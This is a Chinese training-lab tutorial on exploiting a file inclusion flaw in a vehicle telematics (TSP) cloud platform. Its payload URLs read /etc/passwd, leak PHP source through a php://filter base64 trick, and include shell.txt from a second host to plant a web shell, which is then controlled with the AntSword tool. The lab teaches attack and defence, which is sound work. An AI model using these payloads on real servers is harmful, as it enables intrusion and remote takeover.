轩辕实验室┃智能网联汽车信息安全实训平台-TSP云平台的文件包含漏洞实验

来源:上海控安
2020-11-18
1846

以下文章来源于轩辕实验室 ,作者轩辕实验室

轩辕实验室轩辕实验室

车联网信息安全和预期功能安全技术


微信图片_20201022180405.jpg



智能网联汽车信息安全实训平台的文件包含漏洞实验,测试方案覆盖车机软件、车载通信、车内智能终端设备、车内总线等检测环境。


01
测试对象
TSP云平台


02
教学目的
通过指导学生上机实践,让学生学习利用TSP云平台的文件包含漏洞进行攻击的基本原理和操作过程,了解除汽车本身外,TSP平台可能存在的安全威胁,并加强安全防护意识。


03
详细介绍
本实验介绍一种对TSP云平台进行文件包含漏洞利用的基本过程。利用本地文件包含查看服务器端的隐私文件,利用远程文件包含向服务器上传木马,并使用中国蚁剑连接木马,从而实现对服务器的远程控制。


04
依赖软件工具
中国蚁剑
一个网站管理工具,也常用于授权人员对网站的安全渗透测试。本实验使用这个工具连接在远程文件包含中植入的网站木马。


05
依赖硬件工具
Windows系统PC,Ubuntu系统工控机。



06
实验步骤


1.jpg

实验流程和网络拓扑

01
搜索到TSP云平台的文件包含漏洞

打开TSP云平台登录页面,观察到URL的参数filename的值是一个login.php,是一个页面,因此推测该平台存在文件包含漏洞。
http://192.168.9.135/include.php?filename=login.php



2.jpg

代码使用了文件包含函数


使用以下命令测试,可以确定漏洞确实存在。
http://192.168.9.135/include.php?filename=/etc/passwd



3.jpg

验证存在文件包含漏洞


使用同样的方法读取key2.php,发现不能直接读取到key信息。
http://192.168.9.135/include.php?filename=test/key2.php



02
使用本地文件包含来读取本地文件隐私数据

本实验在test目录内放了两个key.php文件。使用以下命令读取key1.php,可以得到解析后的内容。

http://192.168.9.135/include.php?filename=test/key1.php


4.jpg

可以直接读取服务器端的文件内容


使用同样的方法读取key2.php,发现不能直接读取到key信息。
http://192.168.9.135/include.php?filename=test/key2.php


5.jpg

无法看到完整的源代码


为了获取到源代码的内容,可以利用php伪协议,读取key2.php经过base64加密后的数据。
http://192.168.9.135/include.php?filename=php://filter/read=convert.base64-encode/resource=test/key2.php


6.jpg

显示编码后的php文件源代码


将base64密文解码,就可以得到源码中隐藏的key。


7.jpg

看到解码后的源码内容


03
使用远程文件包含来植入木马

除了读取服务器端的本地文件,还可以利用远程文件包含向服务器上传木马,从而控制服务器。本实验已经在本地部署了一个apache服务器,并定义了木马生成文件 “shell.txt”。


8.jpg

上传木马


访问以下网址来上传木马:
http://192.168.9.135/include.php?filename=http://10.88.20.117/shell.txt


9.jpg

植入木马


04
通过菜刀或中国蚁剑来连接木马,远程控制服务器

打开中国蚁剑,点击右键,选择 “添加数据”,在 “URL地址” 中输入上一步上传木马使用的URL,连接密码为 “shell”。点击 “测试连接”,显示连接成功后,点击左上角 “添加” 来确认添加此连接。


10.jpg

使用中国蚁剑连接木马


双击该连接,可以看到网站后台的所有文件,并且可以进行新建目录、上传文件等操作。


11.jpg

实现对服务器的远程控制




微信图片_20201022180704.jpg



收藏
点赞
2000